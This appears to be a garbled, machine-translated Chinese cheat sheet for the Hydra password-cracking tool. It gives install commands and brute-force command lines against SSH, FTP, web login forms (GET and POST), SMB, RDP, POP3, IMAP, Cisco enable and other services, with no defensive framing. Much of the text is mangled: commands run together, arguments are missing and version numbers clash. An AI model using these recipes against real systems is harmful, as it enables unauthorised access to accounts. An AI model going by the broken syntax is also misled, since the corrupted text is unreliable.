Citation: http://www.cnblogs.com/mchina/archive/2013/01/01/2840815.html
Installation:
1 wget http://www.thc.org/releases/hydra-8.1.tar.gz2tar zxvf hydra- 7.4. 1. Tar . GZ 3 cd hydra-7.4. 1 4 ./5make makeinstall
1 192.168. 1.104 SSH
FTP -L user name-p password Dictionary-t thread (default)-FTP -L user name-p password Dictionary-e ns-vv
- Get way to commit, hack Web login:
HYDRA-L User name-p password Dictionary-t thread-vv-e nsIP http-get/admin/-L user name-p password Dictionary-t thread-vv-e ns-f IP http-get/admin/in dex.php
- Post mode submission, Hack Web login:
<formAction= "index.php"Method= "POST"><inputtype= "text"name= "Name" /><BR><BR><inputtype= "Password"name= "pwd" /><BR><BR><inputtype= "Submit"name= "Sub"value= "Submit"></form>
1 127.0. 0.1 http-post-form "index.php:name=^user^&pwd=^pass^:<title>invalido</title>"
Description: cracked user name is admin, Password dictionary is pass.lst, the cracked result saved in Ok.lst,-t is the number of simultaneous threads for 1,-f is when cracked a password on stop, IP is local, is the destination IP, Http-post-form means the hack is a form password hack submitted using the Post form of HTTP. The following parameter is the Name property of the corresponding form field in the Web page, and the following <title> is the return information hint that represents the error guess, which can be customized.
10.36. 16.18 HTTPS
HYDRA-L User name-p password Dictionary-s port number-VV IP teamspeak
10.36. 16.18 10.36. 16.18 cisco-enable
10.36. 16.18 SMB
Hydra-l muts-p pass.txt my.pop3.mail POP3
Hydra IP rdp-l administrator-p pass.txt-v
Example reference: http://dfyl520.cn/?post=67
Hydra-l admin-p pass.txt http-proxy://10.36.16.18
10.36. 16.18 -C defaults.txt-6 IMAP://[Fe80::2c:31ff:fe12:ac11]:143/plain
+ -E ns-f-V
Linux Brute force hack tool Hydra